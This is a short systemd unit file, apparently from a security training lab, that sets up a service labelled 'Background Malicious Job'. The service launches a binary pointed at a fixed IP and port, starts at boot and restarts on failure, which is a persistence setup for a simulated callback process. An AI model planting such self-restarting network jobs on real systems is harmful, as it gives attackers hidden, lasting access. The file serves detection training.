[Unit]
Description=Background Malicious Job
After=network.target

[Service]
Type=simple
User=pslearner
ExecStart=/home/pslearner/background-job --ip 172.31.140.10 --port 10197 --idle 0 --active 1
Restart=on-failure
RestartSec=5


[Install]
WantedBy=multi-user.target
